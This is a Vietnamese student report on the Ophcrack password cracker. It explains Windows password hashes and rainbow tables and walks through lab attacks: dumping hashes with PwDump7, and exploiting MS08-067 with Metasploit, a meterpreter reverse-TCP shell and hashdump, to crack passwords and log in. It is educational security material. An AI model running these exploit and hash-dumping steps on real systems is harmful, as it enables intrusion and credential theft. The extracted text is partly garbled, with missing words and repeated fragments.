HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Bài báo cáo: Tìm hiểu cơng cụ Ophcrack Kali Linux Mục lục DANH SÁCH CÁC THUẬT NGỮ TIẾNG ANH VÀ VIẾT TẮT DANH MỤC CÁC HÌNH VẼ LỜI MỞ ĐẦU Chương Giới thiệu công cụ Ophcrack 1.1 Giới thiệu sơ lược Ophcrack 1.2 Lịch sử hình thành 1.3 Các tính Ophcrack 1.4 Giới thiệu cách làm việc Ophcrack 1.4.1 Tìm hiểu cách Windows lưu Password 1.4.2 Kiểu truyền thống để Crack Password 1.4.3 Phương thức để Crack Password 1.4.4 Rainbow tables: Bảng hash tính tốn 1.4.5 Ophcrack khơng an tồn Windows Password Chương Hướng dẫn cài đặt 10 2.1 Cài đặt công cụ Ophcrack Kali Linux 10 2.2 Cài đặt công cụ Ophcrack Windows 10 Chương Hướng dẫn sử dụng 13 Chương Demo sử dụng Ophcrack 16 4.1 LAB 1: Bẻ khóa mật Windows sử dụng Pwdump7 Ophcrack 16 4.1.1 Chuẩn bị 16 4.1.2 Kịch công 16 4.1.3 Thực công 16 4.2 LAB 2: Bẻ khóa mật Windows sử dụng Ophcrack kết hợp Metasploit 25 4.2.1 Chuẩn bị 25 4.2.2 Kịch công 25 4.2.3 Thực công 26 SO SÁNH 38 ĐÁNH GIÁ 39 KẾT LUẬN 39 Tài liệu tham khảo 40 DANH SÁCH CÁC THUẬT NGỮ TIẾNG ANH VÀ VIẾT TẮT Từ viết tắt GPL LM SAM Thuật ngữ tiếng Anh/Giải thích Thuật ngữ tiếng Việt/Giải thích CSV CD DVD GUI RPC IP TCP DOS CPU GPU PDF FTP GNU General Public License Local Area Network Manager Security Accounts Manager New Technology Local Area Network Manager Comma-Separated Values Compact Disc Digital Video Disc Graphical User Interface Remote Procedure Call Internet Protocol Transmission Control Protocol Disk Operating System Central Processing Unit Graphics Processing Unit Portable Document Format File Transfer Protocol, WEP Wired Equivalent Privacy WPA Wi-Fi protected access WPS Wi-Fi Protected Setup Giấy phép Cơng cộng GNU Trình quản lý Mạng cục Trình quản lý Tài khoản Bảo mật Trình quản lý Mạng cục công nghệ Giá trị phân cách bằng dấu phẩy Đĩa CD Đĩa phim kĩ thuật số Giao diện đồ họa người dùng Gọi hàm từ xa Giao thức Internet Giao thức điều khiển truyền vận Hệ điều hành DOS Bộ phận xử lý trung tâm Bộ phận xử lý đồ họa Định dạng Tài liệu Di động Giao thức truyền tập tin Quyền riêng tư tương đương có dây Quyền truy cập bảo vệ bằng Wi-Fi Thiết lập Wi-Fi bảo vệ NTLM DANH MỤC CÁC HÌNH VẼ Hinh Ophcrack phiên 3.8.0 Hình 2.1 Chọn compornents để cài đặt vào mục tables cho ophcrack 10 Hình 2.2 Giao diện Ophcrack Windows 12 Hình 2.3 Select ophcrack table 12 Hình 3.1 Tìm ophcrack System Menu Kali Linux 13 Hình 3.2 Giao diện GUI Ophcrack 14 Hình 3.3 Giao diện dòng lệnh hướng dẫn Ophcrack 15 Hình 4.1 Command Prompt 16 Hình 4.2 Tải khoản mật hashed Windows 17 Hình 4.3 Chạy chương trình PwDump7 18 Hình 4.4 Sao chép kết chạy PwDump7 vào tệp Hashes.txt 18 Hình 4.5 Kết tệp Hashes.txt có thơng tin tài khoản, mật (hashed) 19 Hình 4.6 Click vào nút Load cơng cụ ophcrack để tải lên tệp Hashes.txt 20 Hình 4.7 Tệp Hashed.txt tải lên công cụ ophcrack 21 Hình 4.8 Chọn bảng Vista free cho ophcrack 21 Hình 4.9 Bảng vista free chọn chuẩn bị cho bẻ khóa mật 22 Hình 4.10 Mật bẻ khóa thành cơng 23 Hình 4.11 Màn hình đăng nhập vào Windows 24 Hình 4.12 Đăng nhập thành công vào Windows 24 Hình 4.13 Kiểm tra IP Windows XP SP3 26 Hình 4.14 Kiểm tra IP máy Kali Linux 27 Hình 4.15 Khởi tạo chương trình Metasploit 27 Hình 4.16 Tìm kiếm lỗ hổng ms08_067 28 Hình 4.17 Thực thi câu lệnh khai thác lỗ hổng ms08_067 28 Hình 4.18 Cấu hình payload meterpreter 28 Hình 4.19 Cấu hình IP máy nạn nhân 29 Hình 4.20 Cấu hình IP máy công 29 Hình 4.21 Kiểm tra thơng số cấu hình để chuẩn bị tiến hành khai thác lỗ hổng 30 Hình 4.22 Khai thác lỗ hổng ms08_067 thành công máy nạn nhân 30 Hình 4.23 Hash files SAM Windows XP SP3 30 Hình 4.24 Tệp hashxp.txt lưu thơng tin tài khoản, mật (hashed) Windows XP SP3 31 Hình 4.25 Click vào nút Load cơng cụ ophcrack để tải lên tệp hashxp.txt 32 Hình 4.26 Tệp hashxp.txt tải lên công cụ ophcrack 33 Hình 4.27 Chọn bảng XP free fast cho ophcrack 34 Hình 4.28 Bảng XP free fast chọn chuẩn bị cho bẻ khóa mật 35 Hình 4.29 Mật bẻ khóa thành cơng 36 Hình 4.30 Màn hình đăng nhập vào Windows XP SP3 37 Hình 4.31 Đăng nhập thành cơng vào Windows XP SP3 37 LỜI MỞ ĐẦU Cách mạng Công nghiệp lần thứ tư hay Công nghiệp 4.0 tiến ngày gần với chúng ta, thời kỳ công nghệ ngày hội nhập phát triển, vấn đề bảo mật yếu tố ưu tiên hàng đầu Đây vấn đề vô phức tạp kỹ thuật bảo mật hạn chế nhiều mặt, thêm vào kẻ công ngày sử dụng thủ đoạn tinh vi, đại Bằng cách đó, họ vượt qua hàng rào bảo mật tìm điểm yếu hay lỗ hổng tồn hệ thống Trong vấn đề bảo mật quan tâm có lẽ mật vấn đề gần gũi với Chắc chắn rằng sở hữu tài sản riêng có sử dụng mật làm phương thức bảo mật Với mục tiêu hiểu cách thức cơng để biết cách phịng chống, báo cáo tìm hiểu “Password Attacks” sử dụng công cụ Ophcrack Kali Linux Bài báo cáo sử dụng cho mục đích học tập, nghiêp cứu, khơng sử dụng với mục đích xấu ảnh hưởng đến tổ chức, cá nhân Em xin chân thành cảm ơn đến giảng viên TS Đặng Minh Tuấn hướng dẫn hoàn thiện báo cáo cách hồn chỉnh Chương Giới thiệu cơng cụ Ophcrack 1.1 Giới thiệu sơ lược Ophcrack Ophcrack chương trình mã nguồn mở miễn phí (được cấp phép GPL) bẻ khóa mật đăng nhập Windows bằng cách sử dụng hàm băm LM thông qua rainbow tables Chương trình bao gồm khả nhập hàm băm từ nhiều định dạng khác nhau, bao gồm kết xuất trực tiếp từ tệp SAM Windows Trên hầu hết máy tính, ophcrack bẻ khóa hầu hết mật vòng vài phút Rainbow tables sử dụng cho hàm băm LM nhà phát triển cung cấp miễn phí Theo mặc định, ophcrack đóng gói với bảng cho phép bẻ khóa mật không 14 ký tự sử dụng ký tự chữ số Có sẵn để tải xuống miễn phí bốn bảng Windows XP bốn bảng Windows Vista Objectif Sécurité chí cịn có bảng lớn để mua nhằm mục đích sử dụng chuyên nghiệp Các bảng cầu vồng lớn hàm băm NTLM để bẻ khóa Windows Vista / Windows Ophcrack có sẵn dạng phân phối Live CD, tự động hóa việc truy xuất, giải mã bẻ khóa mật từ hệ thống Windows Một phân phối Live CD có sẵn cho Windows XP trở xuống khác cho Windows Vista Windows Các phân phối Live CD ophcrack xây dựng bằng SliTaz GNU / Linux 1.2 Lịch sử hình thành Cơng cụ Ophcrack phát triển Cedric Tissieres Philippe Oechslin, cấp phép GPL Trang chủ Ophrack: https://ophcrack.sourceforge.io/ Mã nguồn SourceForge: https://sourceforge.net/projects/ophcrack/files/ophcrack/ Bắt đầu từ phiên 2.3, Ophcrack bẻ khóa hàm băm NTLM Điều cần thiết trình tạo băm LM bị vơ hiệu hóa (đây mặc định cho Windows Vista) mật dài 14 ký tự (trong trường hợp đó, băm LM khơng lưu trữ) Bắt đầu với phiên 3.7.0, mã nguồn chuyển từ SourceForge sang GitLab địa chỉ: https://gitlab.com/objectifsecurite/ophcrack/ Công cụ trải qua nhiều năm phát triển, phiên 3.8.0 Hình Ophcrack phiên 3.8.0 1.3 Các tính Ophcrack - Chạy Windows, Linux / Unix, Mac OS X, - Crack hàm băm LM NTLM - Các bảng miễn phí có sẵn cho Windows XP Vista / - Mô-đun Brute-force cho mật đơn giản - Chế độ kiểm tra xuất CSV - Đồ thị thời gian thực để phân tích mật - Có sẵn LiveCD để đơn giản hóa việc bẻ khóa - Kết xuất tải hàm băm từ SAM mã hóa khơi phục từ phân vùng Windows - Phần mềm mã nguồn mở miễn phí (GPL) 1.4 Giới thiệu cách làm việc Ophcrack 1.4.1 Tìm hiểu cách Windows lưu Password Password windows lưu giữ bảo vệ với bảng hash, việc lưu trữ thực bằng cách dùng phương trình chiều để tính tốn chuỗi hash cho password mà người dùng windows nhập vào Do việc sử dụng hàm chiều việc tính ngược từ chuỗi hash để lấy password khơng thể Ví dụ với password là: "Sommer1968” chuỗi hash là: "b2a024a4c6b13672e3517200d4b26a68” Windows lưu chuỗi hash cho người sử dụng máy file SAM đường dẫn: %windir%\system32\config Khi người sử dụng nhập vào password chuỗi hash tính tốn so sánh với chuỗi hash lưu file SAM, khơng giống người dùng đăng nhập vào windows 1.4.2 Kiểu truyền thống để Crack Password Cho đến nay, chương trình dùng để phá password làm việc với phương thức tìm thử tất khả có Chương trình tìm chẳng hạn với chữ chữ … tính chuỗi hash cho so sánh hai chuỗi bằng thành cơng Kiểu làm việc gọi brute force attack Trong trình làm việc việc chiếm nhiều thời gian việc tính tốn từ password để thu chuỗi hash chiếm nhiều thời gian chương trình phải làm việc tính toán cho password Với password rắc rối với độ dài ký tự việc brute force kéo dài tận năm rưỡi – - – > password dài chắn 1.4.3 Phương thức để Crack Password Chuyên gia mã hóa Martin Hellman suy nghĩ từ năm 1980 phương thức nhanh để giải mã password phát triển phương thức "Time-MemoryTrade-off” (xin lỗi khơng biết tiếng Việt gì) Ý tưởng: thay lần lần tính tốn lại tất khả người ta nên tính tốn trước tất chuỗi hash cho tất password lưu lại Sau đó, cần từ chuỗi hash hệ thống, so sánh với chuỗi hash tính lơi password thực chuỗi Như vậy, password dễ dàng tìm kiếm việc bạn giở telephone book Tất nhiên có lợi phải có bất cập bạn muốn tìm password có độ dài lớn "telephone book” bạn có độ dài đến hàng Terabyte 1.4.4 Rainbow tables: Bảng hash tính tốn Phương thức "Time-Memory Trade-off” có nhiệm vụ làm cho "passwordtelephone book” nhỏ lại, tổng hợp (Trade-off) từ thời gian cần có cho việc giải mã (Time) dung lượng nhớ cần có (Memory) cho tệp tin Mọi thứ hoạt động dựa công thức thông minh cho phép người dùng lưu lại password chuỗi hash vào bảng nhỏ Gần 20 năm sau Hellman, Phillippe Oechslin cải tiến hoàn thiện phương thức này, kiểu bảng mã ông đặt tên Rainbow Table Ở đây, công thức tốn học khơng giải thích nêu lên nguyên tắc chung sau: Người ta chọn password tạo từ chuỗi hash, chuỗi hash thông qua công thức rút gọn Chuỗi hash rút gọn tạo password mới, người ta tính từ chuỗi hash khác, vậy, người ta tạo chuỗi hàng nghìn lần rút gọn Càng lúc nhỏ: Từ chuỗi người ta loại bỏ hết tất giá trị trừ giá trị đầu giá trị cuối sau lưu vào bảng Việc làm làm cho độ lớn "password telephone book” nhỏ trông thấy Khi tìm kiếm password, người ta lại sử dụng chuỗi rút gọn đó, lần rút gọn giá trị chuỗi hash so sánh lại, phù hợp password "có thể " nằm chuỗi rút gọn Tìm kiếm chuỗi: Từ giá trị hash, người ta khơng thể tính ngược lại Giống người ta khơng thể ngược lại chuỗi rút gọn Nhưng người ta "nhảy” đến đầu chuỗi rút gọn tính giá trị password thực chuỗi 1.4.5 Ophcrack có thẻ khơng an tồn Windows Password Chương trình tiếng Anh Ophcrack crack password windows vài giây Philippe Oechslin phát triển chương trình này, để chứng minh khả Rainbow Table ông Chương Hướng dẫn cài đặt 2.1 Cài đặt công cụ Ophcrack Kali Linux Hiện cơng Ophcrack thơng thường có sẵn Kali Linux phiên Ngoài ra, để tiến hành cài đặt Ophcrack Kali Linux phiên chưa có, ta thực lệnh sau: sudo apt-get install ophcrack 2.2 Cài đặt công cụ Ophcrack Windows Tải cài đặt trang chủ Ophcrack địa sau: https://ophcrack.sourceforge.io/ Hoặc trang gitlab: https://gitlab.com/objectifsecurite/ophcrack/ Việc cài đặt Ophcrack tương đối dễ, nhiên có phần lựa chọn thành phần cài đặt cần lưu ý –Hình 2.1 Hình 2.1 Chọn compornents để cài đặt vào mục tables cho ophcrack 10 4.2.3 Thực công Kiểm tra IP máy Windows XP SP3 bằng lệnh ipconfig Hình 4.13 Kiểm tra IP Windows XP SP3 Ta có IP máy Windows XP SP3 là: 192.168.1.54 Kiểm tra IP máy Kali Linux bằng lệnh ifconfig 26 Hình 4.14 Kiểm tra IP máy Kali Linux Ta có IP máy Kali Linux là: 192.168.1.55 Khởi tạo Metasploit máy Kali Linux bằng lệnh msfconsole Hình 4.15 Khởi tạo chương trình Metasploit Tìm kiếm lỗ hổng ms08_087 bằng lệnh search ms08_087 27 Hình 4.16 Tìm kiếm lỗ hổng ms08_067 Sử dụng câu lệnh use exploit/windows/smb/ms08_067_netapi để khai thác lỗ hổng Hình 4.17 Thực thi câu lệnh khai thác lỗ hổng ms08_067 Cấu hình thuộc tính để chuẩn bị cho cơng chiếm quyền điều khiển set payload windows/meterpreter/reverse_tcp (Meta-Interpreter advanced payload Muc đích để cung cấp tập lệnh để khai thác, công máy remote computers Nó viết từ developers dạng shared object (DLL) files Meterpreter thành phần mở rộng thực thi nhớ, hồn tồn khơng ghi lên đĩa nên tránh phát từ phần mềm chống virus Meterpreter cung cấp tập lệnh để khai thác remote computers.) Hình 4.18 Cấu hình payload meterpreter 28 set RHOST 192.168.1.54 (máy nạn nhân – Windows XP SP3) Hình 4.19 Cấu hình IP máy nạn nhân set LHOST 192.168.1.55 (máy cơng – Kali Linux) Hình 4.20 Cấu hình IP máy cơng Sử dụng lệnh show options để kiểm tra lại thông số 29 Hình 4.21 Kiểm tra thơng số cấu hình để chuẩn bị tiến hành khai thác lỗ hổng Demo để mặc định Target – tự động chọn mục tiêu Tiến hành khai thác lỗi bằng cách sử dụng lệnh exploit Hình 4.22 Khai thác lỗ hổng ms08_067 thành công máy nạn nhân Khai thác lỗi thành công Sử dụng lệnh hashdump để hash files SAM Windows XP SP3 Hình 4.23 Hash files SAM Windows XP SP3 Copy đoạn hashdump lưu vào file text, lưu tệp hashxp.txt 30 Hình 4.24 Tệp hashxp.txt lưu thơng tin tài khoản, mật (hashed) Windows XP SP3 10 Chạy ứng dụng Ophrack tảng Kali Linux 11 Click vào nút Load, chọn PWDUMP File menu thả xuống 31 Hình 4.25 Click vào nút Load cơng cụ ophcrack để tải lên tệp hashxp.txt 12 hashxp tải ứng dụng hình 32 Hình 4.26 Tệp hashxp.txt tải lên công cụ ophcrack 13 Click vào nút Table để tải/chèn bảng 14 Chọn bảng Trong trường hợp này, chọn XP free fast table 33 Hình 4.27 Chọn bảng XP free fast cho ophcrack 15 Chọn nhấn Install 16 Chọn vị trí cho folder chứa bảng Demo sử dụng bảng mặc định ứng dụng nên folder chung vị trí với ứng dụng 17 Click OK 34 Hình 4.28 Bảng XP free fast chọn chuẩn bị cho bẻ khóa mật 18 Nhấn nút Crack để bắt đầu bẻ khóa 35 Hình 4.29 Mật bẻ khóa thành cơng 19 Ta thấy cột LM Pwd xuất password user thai tung 20 Kết cho thấy user không thiết lập mật khẩu, user với mật bẻ khóa Nếu kết có mật chưa bẻ khóa, thử bảng khác để bẻ khóa 21 Trong trường hợp này, user thai, tung bẻ khóa Bây ta truy cập Windows XP SP3 bằng user bằng mật 22 Nhập mật 123 đăng nhập user thai 36 Hình 4.30 Màn hình đăng nhập vào Windows XP SP3 Đăng nhập thành cơng Hình 4.31 Đăng nhập thành cơng vào Windows XP SP3 37 SO SÁNH So sánh Ophcrack với cơng cụ khác: Ophcrack Ophcrack trình bẻ khóa mật Windows dựa Rainbow Tables John the Ripper John the Ripper trình bẻ khóa mật nhanh cho Unix, macOS, Windows, DOS, BeOS OpenVMS Kon-Boot Kon-Boot công cụ hack mật khẩu, khôi phục mật dành cho Windows Mac hashcat Trình bẻ khóa mật hỗ trợ CPU / GPU nhanh giới L0phtCrack L0phtCrack ứng dụng kiểm tra khôi phục mật (bây gọi L0phtCrack 6) ban đầu Password Recovery Bundle Nhanh chóng khôi phục đặt lại mật cho tài liệu Windows, PDF, ZIP, RAR, Office Word / Excel / PowerPoint Lấy mật cho tin nhắn tức thì, tài khoản email, trình duyệt web, thơng tin đăng nhập FTP, v.v Wifite Để cơng nhiều mạng mã hóa WEP, WPA WPS liên tiếp Reset Windows Password - PCUnlocker Là tiện ích khơi phục khởi động để bỏ qua đặt lại mật người dùng quản trị viên bị Windows 10/8/7 / Vista / XP / 2019/2016/2012/2008 38 ĐÁNH GIÁ • • - Ưu điểm Ophcrack: Phần mềm miễn phí có sẵn để tải xuống trực tuyến Mật phục hồi tự động bằng phương pháp LiveCD Không cần cài đặt phần mềm để khơi phục mật Khơng có kiến thức mật có cần thiết Ophcrack hoạt động với Windows 8, Windows 7, Windows Vista Windows XP Nhược điểm Ophcrack: Một số chương trình chống vi-rút nhận dạng nhầm Ophcrack dạng Trojan vi-rút Cần cài đặt directories rainbow table tương đối nặng Mật lớn 14 ký tự khơng thể bị bẻ khóa Sẽ khơng crack mật Windows 10 đơn giản KẾT LUẬN Ophcrack cách tốt để khôi phục mật Windows Đó hoạt động gần chống lừa đảo, khôi phục mật tự động tốc độ tổng thể Ophcrack thuộc hàng đầu Ophcrack yêu cầu số chuẩn bị công cụ khôi phục mật tốt Chỉ sau vài phút chạy phần mềm, Ophcrack tìm thấy tất mật Windows bạn hiển thị chúng hình! Mặc dù tồn số khuyết điểm, công cụ đáng sử dụng với khả khôi phục mật tốt, cách sử dụng cài đặt đơn giản, giúp người dùng PC không may quên thông tin đăng nhập Windows 39 Tài liệu tham khảo [1] [2] [3] [4] [5] [6] [7] [8] H X Dậu, “An toàn toàn bảo mật hệ thống thông tin,” 2017 Wikipedia, “Ophcrack – Wikipedia.” [Online] Available: https://en.wikipedia.org/wiki/Ophcrack [Accessed: 22-Dec-2021] OnnoCenterWiki, “Kali Linux: ophcrack – OnnoCenterWiki.” [Online] Available: https://lms.onnocenter.or.id/wiki/index.php/Kali_Linux:_ophcrack [Accessed: 22Dec-2021] Инструменты Kali Linux, “ophcrack - Инструменты Kali Linux.” [Online] Available: https://kali.tools/?p=3688 [Accessed: 22-Dec-2021] Kevin Beaver, “Hacking For Dummies 2nd Edition,” no 978-0470052358, pp 98– 100, 2007 Shiva V N Parasram, Alex Samm, Damian Boodoo, Gerard Johansen, Lee Allen, Tedi Heriyanto and Shakeel Ali, “Kali Linux 2018: Assuring Security by Penetration Testing - Fourth Edition,” no 9781789341768, pp 299–300, 2018 Shakeel Ali and Tedi Heriyanto, “BackTrack 4: Assuring Security by Penetration Testing,” 2011 William (Chuck) Easttom II, “Penetration Testing Fundamentals: A Hands-on Guide to Reliable Security Audits 1st Edition,” no 978-0789758415, pp 6–10, 2018 40 ... đặt công cụ Ophcrack Kali Linux Hiện cơng Ophcrack thơng thường có sẵn Kali Linux phiên Ngoài ra, để tiến hành cài đặt Ophcrack Kali Linux phiên chưa có, ta thực lệnh sau: sudo apt-get install ophcrack. .. table Trên Hình 2.3, mở đến đĩa LiveCD, mục slax \ophcrack\ tables, sau nhấp OK 12 Chương Hướng dẫn sử dụng Để khởi động công cụ Ophcrack Kali Linux, ta cần tới System Menu tìm ophcrack Hình 3.1 Tìm. .. 1.4.5 Ophcrack khơng an tồn Windows Password Chương Hướng dẫn cài đặt 10 2.1 Cài đặt công cụ Ophcrack Kali Linux 10 2.2 Cài đặt công cụ Ophcrack Windows